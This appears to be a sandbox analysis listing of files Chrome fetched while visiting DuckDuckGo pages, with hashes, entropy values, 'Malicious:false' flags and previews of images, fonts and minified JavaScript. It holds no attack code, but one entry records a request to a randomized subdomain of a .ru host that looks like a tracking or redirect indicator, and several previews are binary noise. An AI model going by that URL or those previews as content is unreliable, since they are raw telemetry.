                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):3001
                                                                                                                                                            Entropy (8bit):4.714848768159009
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:TMRlHa9kgrrsCWlK1P3Fs7geAEHxvV2brUEzf7nv4ezLAbJJROnacm5dGnb/fjsC:gRlMkhgtkgDA2bgEHnvtQJJRDcm5s/fH
                                                                                                                                                            MD5:89145F55DF634A09980D63C372B530A4
                                                                                                                                                            SHA1:2C03EA817E643B5884F61BF43C2CA791271D1CBF
                                                                                                                                                            SHA-256:DC40F755F049A611620BD5354B9DC5B097E45E80232CD467364E415A83064A81
                                                                                                                                                            SHA-512:4B39096531CC7E62744A99B9F0BFEDB8119A268DB4AE3B4049EB07B6475F0D75B40C2000A0DCCABFD149974D0E06474BF7CCD28B40A826626D2756C9BE6B723D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/about-fg-sm.svg
                                                                                                                                                            Preview:<svg width="375" height="359" viewBox="0 0 375 359" fill="none" xmlns="http://www.w3.org/2000/svg">.<mask id="mask0_2_6694" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="0" y="0" width="373" height="346">.<rect width="372.627" height="345.597" fill="#C4C4C4"/>.</mask>.<g mask="url(#mask0_2_6694)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M158.555 227.495L181.644 259.69H183.431V249.57H197.606V216.457H205.706V199.9L221.91 188.858V205.419H227.985V249.57H240.136V236.327H258.361V208.178L266.465 202.659L274.565 208.178V230.254H278.615V186.098L302.916 202.659V214.347H313.041V174.574L321.145 169.055L329.245 174.574V229.445H335.32V212.67H357.596V238.532H361.646V197.69H367.721V179.476H374.609L385.95 164.022L397.291 179.476H404.176V197.69H410.251V213.697H416.326V186.098L424.426 180.579L432.527 186.098V213.697H436.58V253.986H444.68V213.697H448.73L458.856 199.9L468.981 213.697H473.031V241.292H485.182V197.136L501.385 208.178V221.976H509.486V241.292L519.611 227.495L542.699 259.69H558.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 500x434, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):70484
                                                                                                                                                            Entropy (8bit):7.466837944243974
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:P4lHE53qMKx8OQCiQJK4Xpv8tmRV8ggdETwOhucaVdq:A653qTQFYK4XpEty8ggdE1BaVdq
                                                                                                                                                            MD5:C0124E5D0955F7A3B54685A542404058
                                                                                                                                                            SHA1:8F2D793E13DB772C8A174E05094C600D07917961
                                                                                                                                                            SHA-256:78C595F2D85AB42079072BE35CC7FA8923C9DFA6583E838B81B75133D9D549BF
                                                                                                                                                            SHA-512:B4161685DF4B27F645D41260C3E99EA4C24C108A9173BED119E983FE883508D10D298B5CFA0BBBE1980D3AB50F02B4251CA174A38786ED203071540FEC0B4759
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/download-bg-dark-md-lg.jpg
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.........................................................................................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..#@...O..;}+..o..~c..^..a.?.................GO.v......p......jz....................._.A..........G.E.......|...z.$.._....`.1.Ak..<....1...........x\...=.........$......z........#?..^.`....4.*....x.1...*. @?.....x..n.y.={._....W....'.8......_...{w.........K_....".....s.~.......i>....\...........}G...6....2....~G...ry.t..l;.Z..}?/Q....=z.i.o/...'.}.;...q.\..._.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):185933
                                                                                                                                                            Entropy (8bit):5.895001324343921
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:bAPZR6R6BxJ1Wxuto28Q1iWBKQME9rLi/:bASxyo28FWBKJEVG/
                                                                                                                                                            MD5:7BB0CD7DA8E976684D4CE28FD9B5F9FE
                                                                                                                                                            SHA1:EDB271BBA12BC497A0BC90284075E0392BAB6C1C
                                                                                                                                                            SHA-256:A6295D37F77116BEFA3941D8859424817DD00A48EE13F7C97FD7EA87FB3B6093
                                                                                                                                                            SHA-512:0EBF389DEC4392E944A9880C97E5EA037D097A9566062230B46D24317782E6ACF657F173C8E28BD5507018F7CB00E4A61A3E5BCF605EEB16D7D0849438886B41
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/4770-0c9bfd7371e35a41.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4770],{33436:function(e,i,a){"use strict";a.d(i,{Z:function(){return p}});var t=a(59499),s=a(17674),c=a(67294),o=a(86896),r=a(94184),n=a.n(r),M=a(682),l=a(30178),N=a(85194),g=a(18999),j=a(95912),u=a(87188),d=a(76029),D=a(91644),I=a.n(D),x=a(98988),A=a(85893);function L(e,i){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);i&&(t=t.filter((function(i){return Object.getOwnPropertyDescriptor(e,i).enumerable}))),a.push.apply(a,t)}return a}function z(e){for(var i=1;i<arguments.length;i++){var a=null!=arguments[i]?arguments[i]:{};i%2?L(Object(a),!0).forEach((function(i){(0,t.Z)(e,i,a[i])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(a)):L(Object(a)).forEach((function(i){Object.defineProperty(e,i,Object.getOwnPropertyDescriptor(a,i))}))}return e}var T={default:{ios:{dark:d.AppStoreWhite,light:d.AppStoreWhiteBordered},android:{dark:d.PlayStoreWhite
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 865 x 1272, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):58141
                                                                                                                                                            Entropy (8bit):7.975723390948211
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:0ONeqjXSZyi0IoiEvnLi5y7EvgsZ8x8QDkouVB1g9wr:0ONeSi0IX5yogSRQIogBqa
                                                                                                                                                            MD5:00C0C21B1074585D95821C0EEA5B61EC
                                                                                                                                                            SHA1:8681EAA015046F783F48FAE1805AF9D803DEA789
                                                                                                                                                            SHA-256:ECB9BECF438553D4136C18B82EAB32A292E60A15F4206FCAEA4407AC557B0A19
                                                                                                                                                            SHA-512:ED5EC6048F1A790A9102BB17411B2A59437A64201EC63786C3E34B871F756F0BF7A370FC02C665407B46B8993DF3AFC2006598573BD6B76E4389F227E54BE239
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/email-protection-ios-light.png
                                                                                                                                                            Preview:.PNG........IHDR...a...........:.....PLTE...***................................................................................................................................................mL....... !".....222.............X3..._ch............&&&...???............Q2.aaa...9i.XXY........IIIzzz.................................<=>.................ttu.......................MMM...............fgg...ppp~~~.................kJ..]]]........TTT+++......U~...............uwy.......c.........777...CCC...nnn......y[........qP....uV....l......`B...w..x.mM....d......`di......k..Es..........4.................mmmM.<.......vW.b?dhm......k.........imq...jjj.c@...w.....~...............fjo...F.6....k3..6....3...6......3...E[..y5..3.b3....u.i[n..`>U.3........0tRNS..........!%*(#|{v..'..Y;fO..u..............vw...IDATx..............................].Qn...0....7..x.b.....jk.D$a.U.m..D....w...O|.A^....'+|#p.3).....a8.j........B..@......,?.K?..m...
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):161764
                                                                                                                                                            Entropy (8bit):4.707396915369752
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:kDncp/u8gbZrD+e398Wh6y9fqtNo9+d7ymL9nlH7YyGJpgUXrurPihGutNaG5r/v:H280rSe9aLfgomrgPihGutNaGl/v
                                                                                                                                                            MD5:3C439AD0DB3844BF0673C2B0A702A3D2
                                                                                                                                                            SHA1:FEEBED692D5881F98F8DCC3967F7416AD524672A
                                                                                                                                                            SHA-256:8B58CED524F72170394688BA13379B5CA100F8C136252F4A22D2F8E9E7C5BAE4
                                                                                                                                                            SHA-512:9A6EE86878D36A19CC10085E5CA2D5926BAE2942B3285759CC228A221E0188210DB24753D45F88D01BD3E8C8888132772189545F5D7CFFF164F325A5E51D7E4B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[56987],{66998:function(e,t,a){"use strict";var c,l=a(67294);function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var a=arguments[t];for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&(e[c]=a[c])}return e},r.apply(this,arguments)}t.Z=function(e){return l.createElement("svg",r({fill:"none",viewBox:"0 0 16 16",xmlns:"http://www.w3.org/2000/svg"},e),c||(c=l.createElement("path",{fill:"currentColor",fillRule:"evenodd",d:"M16 8A8 8 0 110 8a8 8 0 0116 0m-4.191-1.75a.75.75 0 00-1.118-1L7.025 9.347 5.33 7.275a.75.75 0 00-1.16.95l2.25 2.75A.75.75 0 007.559 11l4.25-4.75",clipRule:"evenodd"})))}},51757:function(e,t,a){"use strict";var c,l,r,o,n,i,s,m=a(67294);function p(){return p=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var a=arguments[t];for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&(e[c]=a[c])}return e},p.apply(this,arguments)}
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):12533
                                                                                                                                                            Entropy (8bit):4.249354839422192
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:Y0atbFf+XcQap9VkvTA4lHMJNFsnjx/QwWjLc7+Qro7fFka7Ws7i9OFa4:YD+adkvc4GJUGwWjy+xRkCT7AOj
                                                                                                                                                            MD5:35F578A2F12174F1C4653AF1160B0F23
                                                                                                                                                            SHA1:032243A96C70F1B7D2F8851ADF9669ED295F460D
                                                                                                                                                            SHA-256:9F66A4EFF2062030B217CB92883AC820300A1E061D5FB971C531E6717BB7C505
                                                                                                                                                            SHA-512:81899ED26CF38A03278342B0E36DC018334BCECA72561E1D567F406C1699C0E488CBD9B9AE59E4B3BEF9E550E7F9101D24B53EAB96FED7214CA3BF737B4EB2EA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/media/set-as-default.d95c3465.svg
                                                                                                                                                            Preview:<svg width="96" height="96" viewBox="0 0 96 96" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M71 51C59.9543 51 51 59.9543 51 71V75.3045C51 77.8866 49.0245 80.0891 46.4462 79.9509C29.9083 79.0647 16 65.067 16 48C16 30.3269 30.3269 16 48 16C65.067 16 79.0647 29.9083 79.9509 46.4462C80.0891 49.0246 77.8866 51 75.3046 51H71Z" fill="#557FF3"/>.<path d="M45.9336 66.3137L49.0397 69.4198C50.2045 70.5846 50.884 72.2347 50.6899 73.7878V75.2874C50.6899 77.888 48.6863 80.0993 46.0911 79.9315C29.6878 78.8709 16 64.9305 16 48C16 30.3269 30.3269 16 48 16C49.5752 16 51.1237 16.1138 52.638 16.3337L53 22C53 24.6208 51.6605 27.5843 49.8163 29.4286L47.7779 31.467C46.0307 33.3112 44.963 35.7379 44.963 38.3587V42.1442C44.963 46.4152 41.4686 49.9095 37.1977 49.9095H23.6084C21.473 49.9095 19.7258 51.6567 19.7258 53.7922V54.1804C19.7258 55.1511 20.1141 56.1218 20.8906 56.8983L24.6762 60.6839C26.5204 62.431 28.9471 63.4988 31.5679 63.4988H39.0419C41.6627 63.4988 44.0894 64.4694 45.9336 66.3137Z" fil
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):184354
                                                                                                                                                            Entropy (8bit):5.783961964829207
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:q1ZuZNTLmJnPWtBpgvBlMIaOj633rFId1ski2NqeT6+U8y/t5LlLPW8:GZuZJSJnYOgtsXy/9B
                                                                                                                                                            MD5:B2C79C668BEDEBAE87BBDFD69EDCC88E
                                                                                                                                                            SHA1:2643C95849964B9CC956ACCA8E88D69EA90C129F
                                                                                                                                                            SHA-256:DEE03729FA6E96BC76BEC6BEAC5EA4D68130814183F1ADF00CD347C1CA96A28B
                                                                                                                                                            SHA-512:FABF6C4A833A6E9D3D10CC067AF4F5EA1089CACEF2B47E4EA611028E62428CA5AAE6727A6D032AB4A6B7F10468214B1E19867EF001454FA5EAAC6146B62A6D79
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/pages/about-62f92f4232f2836a.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[12521],{98568:function(M,N,j){"use strict";j.d(N,{Z:function(){return O}});var L=j(50029),I=j(90116),D=j(87794),u=j.n(D),g=j(67294),A=j(94184),i=j.n(A),T=j(80912),t=j(30178),S=j(28746),y=j(85194),C=j(51420);var z=j(84457),x=j.n(z),E=j(85893);function a(){return(0,E.jsxs)(S.Z,{elevation:90,borderRadius:"lg",className:i()(x().card,x().skeleton),children:[(0,E.jsx)("div",{className:x().image}),(0,E.jsxs)("div",{className:x().content,children:[(0,E.jsx)(t.Z,{className:x().title,as:"h3",level:"lg",children:(0,I.Z)(Array(64)).fill("X").join()}),(0,E.jsx)(t.Z,{className:x().category,level:"eyebrow",children:"X"})]})]})}function e(M){var N,j=M.post,L=j.feature_image,I=j.title,D=j.url,u=j.tags,g=new URL(D).pathname.match(/[\w-]+/),A=L.includes("://")?(N=L,(0,C.ZP)("imageProxy",{params:{u:N}})):L,T=u&&(Array.isArray(u)?u[0].name:u.name);return(0,E.jsxs)(S.Z,{as:"a",elevation:90,borderRadius:"lg",className:i()("chromatic-ignore",x().card),h
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4373
                                                                                                                                                            Entropy (8bit):4.3644123653715905
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:vlv4qrvD3pW3U6LG75gTd8N5bPl6RfgTbrsqmFKcoCD0CRbdnazbZ:vqqHUk6LyOTWzbPI1gTbgq6Kc19dnyd
                                                                                                                                                            MD5:50E91E0FB7DB8C2F03F7EDDA252903F8
                                                                                                                                                            SHA1:446F456955C053AC654AFC87C322D2BA41A276B9
                                                                                                                                                            SHA-256:763C118F9265ED438E693ED67531554D71A030CB329B82D3CE0CF67BC4E6B19F
                                                                                                                                                            SHA-512:EB06763B0AB356E76A6E1C3AC26C094156959845692D623D535844C5B6D05DC3BA4C7E6178C5D45618980BC82EC85E14ED874127571C36DCD5F192CB94320231
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:<svg width="1044" height="591" viewBox="0 -28 1044 535" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M964.162 419.052L996.067 462.701H1018.45V534.272L519.532 534.272H0.693359V448.982H20.2816V404.088H31.4749V381.641L53.8658 366.671V389.123H62.2607V448.982H79.0507V431.026H104.236V392.864L115.433 385.382L126.626 392.864V422.794H132.223V362.929L165.803 385.382V401.228H179.795V347.305L190.992 339.823L202.185 347.305V421.696H210.58V398.954H241.362V434.017H246.959V378.645H255.354V353.952H264.871L280.543 333L296.214 353.952H305.728V378.645H314.123V400.347H322.518V362.929L333.711 355.447L344.904 362.929V400.347H350.505V454.969H361.698V400.347H367.295L381.287 381.641L395.278 400.347H400.875V437.758H417.665V377.894L440.056 392.864V411.57H451.249V437.758L465.241 419.052L497.145 462.701H499.615V448.982H519.203V404.088H530.397V381.641L552.788 366.67V389.123H561.183V448.982H577.973V431.026H603.157V392.864L614.355 385.382L625.548 392.864V422.794H631.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 42692, version 1.0
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):42692
                                                                                                                                                            Entropy (8bit):7.994492790543079
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:ttgCAyVLsrAOon38JyYxq2fnE45Ip6tOOO1eNFuAYTzMvAs/lZdGU+5U6:BAY2Ar8rnEDt8NFjA2lZdT6
                                                                                                                                                            MD5:41BEA1A5BF9F18151EBAC78D52BFE8F1
                                                                                                                                                            SHA1:CA03133D7684AB526AE40F89C9A1153B59A8B397
                                                                                                                                                            SHA-256:2F1247934BE433D70D54FC6496101F636DCA8EBA95B2BC02434645FF171E8787
                                                                                                                                                            SHA-512:B670B23A9686631A362A91FF96B65F8F81FE7CF5BA40121F42EA72B9B2509425E926872C45BD6CBC2C4F0DB4822AC8E0C22FFBBFC13465127EAD1991AC34C666
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/font/ProximaNova-ExtraBold-webfont.woff2
                                                                                                                                                            Preview:wOF2...................X...........................?FFTM..f.....D.`..&..F........\..o..`..6.$..<. .._.....a[..q.k..>P.mU .|_i..pD.z.......b....v`........dC.:..0.i...b.. .ws0.9...#X.m.LLh.#p.$.3.5.h........E..G..8.p....*..IwX*...2..<.KN.]....tvW..r.,..x..;....S.>.I%y.J&.MY..+.I.v.J&4..6!...3.u...\1v.E.%s..7......._...$.....~.}.[y..B.4AJ.Z.tV..L.Lw.......;.E...K.......7#.....G.rI..S.^..;.......2..[.F..+O.$<........"..4..t..."%.H.F..Jd..O...y.....]p-..D.l...+.^W.....u.*i.+.8g.qnq........n..u...BFFI.J.Of2..4.hz....F...zyI~..=.6.(..'.j....}...ZY.a.....$....XU(D...G......[k..;QZ.n.Bh.....2..A.fN?.!...J.......9)P..f......_......u...z..$.%mo....I...v....sO.,..Q.HgU5..Yl`.e.%.....h?K>....T{..n......H~..uQ..m..... f...R..j.Y...bvLS..^.M.x9T.. z-+b.0%..$..t.w.]../..y...t..IM.........;...&sfR.G.]......c..H...?....K...RR.'A<...Y@^.........k.>...a.....6=~+.H.....M.${..F...#.B.[.......t....H....'...-.q...........).....L...m...&..%.sT9.......P.. .....,
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):13743
                                                                                                                                                            Entropy (8bit):7.976554063597098
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:HEc8Pf/gf2kKJV4TIe4kfIr6NPz2688RXfQuaT9o:HEJgmb4ukKuPz268wXfQuB
                                                                                                                                                            MD5:2F5AD5ADECF0E139755FBD2D821979B9
                                                                                                                                                            SHA1:7D865EF92D718A865891FEB537034CE4BB5C3C2E
                                                                                                                                                            SHA-256:0FCE1FE1D859A94618124FDDD15BB069EB0639366039CB1FCBD5992D2FAAA0BA
                                                                                                                                                            SHA-512:8940A4C9944DA461C1C46A2DF5B5165D7A8C16BF3DD542A1F4A33B7E50A5675962F631356DB21AE3BD2379CBC095333825BE68AECF1000E4353D377EACDB4419
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/media/edge-lg.36af7682.png
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a...5DIDATx..}y...u.9...j1..k..G#7.,.*..d.p....-.....u].".!......C.nU.....:mI...BD.A+..9.b'Nl.Z,Y..GI..py.9..wO.=..#..3C.+../.l.........V.j[m.m.....V.j[m...!......M.N...f~.0.!NRl&:.S......M.R:..?1uD..c/......>P...]..yy.'.....k?......?....#..D.).].........NQ..'..Qf....9..... {..{...q.O..+.).X...O.0.~>....[|."%.A..L..^L0g....i..*#........,G..L....|..P.5........=....WP... Kz<1.|R.(..l..Q.f...2.P......X#.K=...3F..5..k....O.u.......,upG.xE0....SO.h.!.".J\&l....$.......fc....V..Q.$3...G....7+z~a....@.........,\..f....yS.p...O.L.......L8;M.A.DT...Y..V..e.).D../.Vp3....j...h.!........A..0...?..\f.d..'.M'rlO.7I......h.D<3S..........a..8.....`.w. L.~.;....E.X.Of$Y.|.....Bf.|L..@...n...I...`..S.nM..Bh.eOn..`...........(c.{..5h.N.....2...U..M.*.LP.x&.H....3.e=.7.Mo..3....\#\....]8>.5u......U...k.6&..p...c.>T.C%..F.-l X..b.n.d..(.P.Mj..1o.=.....C.0j..T.d..3......1..m.].
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):4968
                                                                                                                                                            Entropy (8bit):7.942198117156494
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:xX1xgJrBHQaitcZXyllSANDlH7k2OZx8Oqg6HfPY9S/yNG1NEjJ0qak3K:xjgJrBHQaitv3lbkBZcg6HXY9Qyta
                                                                                                                                                            MD5:0436C3B31F517DCEE9E75E0F84E2F940
                                                                                                                                                            SHA1:E6FDFCCC4BF3BAA4A0428A1832480C48B851D82B
                                                                                                                                                            SHA-256:1ECFAAEB33A7F7AFB79C4BD8568593F1B2DB8BF466AFDCC811AFD05A7DF4BC16
                                                                                                                                                            SHA-512:6F8E85D5DBBBA4D3F22C208B933D0A3257800B2BDFBD76B48ADFBE30FF5D2E377F7B27A1C4DD525FE427698CCACADDE7121D7F114A09E7995E747FC2BC6172B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/a-/ALV-UjVXxMbnDH06Mw7_K-VroRytYePj4dzwTxv4lYqsxovxXe5qBnjv=s48-w48-h48
                                                                                                                                                            Preview:.PNG........IHDR...0...0......`n.....sBIT.....O.... IDATX.]....y.....3..O..n.[..K....P..fA.R....,..5..{.`A%...X....dE.n.z>.y..}..p.p.p........`..o.7e./a..b..?..4.F[.6...lr..,.9W.e..>.H .?z....[...2...@.......D........dE\).-S..,...?..4.....2.vu+9 #D.1fdx..............@..bX....o|..4`. ....@2.(.H....#.e$@...B....l.-...%im....2..&=..f.T..(O..go..../....BC.,.....".@.....A........D.......o..!.j\.....GQ.)%....U9G&.r.(........?..}.......c.3l.......g..^C,...L.9......`..F.:.y .C...]...&...(E!.(Z.Wd.5}u.Ag.c....p.....6.....`..U..2".@.4@".......f{[.Y..R`.IH..#...=..~\.../.5....dRjGEi}.}..Vq.\..."IS./...?.0)y.Xn..v.......)T@..@......I.v.8A.R.6.A...19=xG..B.V..N.0........+:..t.SMSm..o.^.......K.M.v8.z}...th.#,.....!#......D.F.D.c..7'O.,P{..)V.k.-........~..H....;..)l.s.....w...{..J.6......4.'.D...zm..-..A...`2..J.4..=. ..eF.X....&;..1........o.~.1..6.....v. 1.c7;.....d..........~.g..Y....a.5&....D(IsA.U..QM=.2.....;(".9o....QQ.....7.......1.w.......
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ru/6724103732481834739iDJKxIdVFTASTOCRUBILTNCEMENYUDAFTOTURFRKJQVELOZMJKP
                                                                                                                                                            Preview:1
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (6367), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6367
                                                                                                                                                            Entropy (8bit):5.305104271229207
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:tRfI6jKMz28pcdn72ab9EuCZ8DJ+KMWnYP6o:tRwUKnpAaEzBK7Yyo
                                                                                                                                                            MD5:5B9849B5BFFC23E25B0F9342E291EA6D
                                                                                                                                                            SHA1:E5B9707D22810606D44B02338005647E0DAFEC70
                                                                                                                                                            SHA-256:EA3AC44FEEF6B745488DCBA5E7D5D2EFD78B2265DFAC082A4AAB6A6878A9484E
                                                                                                                                                            SHA-512:05716B13F06DB7F15E15AECA92075ED4AA3CE1E79E242EB89B7BD9BBAD6723A6FF9C01BF89538628B0243EEB77AFC4B8C465DBE06EACE3C2A8A807B94D8498B8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[41966],{94184:function(e,t){var o;!function(){"use strict";var n={}.hasOwnProperty;function r(){for(var e=[],t=0;t<arguments.length;t++){var o=arguments[t];if(o){var a=typeof o;if("string"===a||"number"===a)e.push(o);else if(Array.isArray(o)){if(o.length){var u=r.apply(null,o);u&&e.push(u)}}else if("object"===a){if(o.toString!==Object.prototype.toString&&!o.toString.toString().includes("[native code]")){e.push(o.toString());continue}for(var l in o)n.call(o,l)&&o[l]&&e.push(l)}}}return e.join(" ")}e.exports?(r.default=r,e.exports=r):void 0===(o=function(){return r}.apply(t,[]))||(e.exports=o)}()},44019:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.getDomainLocale=function(e,t,o,n){return!1};("function"===typeof t.default||"object"===typeof t.default&&null!==t.default)&&"undefined"===typeof t.default.__esModule&&(Object.defineProperty(t.default,"__esModule",{value:!0}),Object.assign(t.default,t),e.ex
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 275 x 175, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):8938
                                                                                                                                                            Entropy (8bit):7.944306978218638
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:9/Kgoe/y98DnRAQuTZcyE5mDXGzfYQcVK+kOgdrN/fgJkhsP1N:pKgoeaC/CcZmyvcVKbdpXO
                                                                                                                                                            MD5:B3DAAA6C16BE4743F6A546FFEFE43BA7
                                                                                                                                                            SHA1:18F896EC629329790C670CB2E99530B6B550E69C
                                                                                                                                                            SHA-256:5B592C166B6E2CB871B015BCAB274E228DD0D1E498FBB162B6193E7AB8E36DD6
                                                                                                                                                            SHA-512:559EF5B2CCC53B33FB7AA362DA9A77C25062D9C24642A90238F91BE4CF1A3802FEE25133BE0A1E2B863EDD54FC27559AA2A3B301139E5F886B6A2E934848634B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/LG6sxx25GBIS9a5NEJT5-5LpXmxRWhKWq__SA0Q__UAEEG_pGhUEAbge1h3uMDCqI-Bn8dnKwxvbKilvB4LHIWD4tg=s275-w275-h175
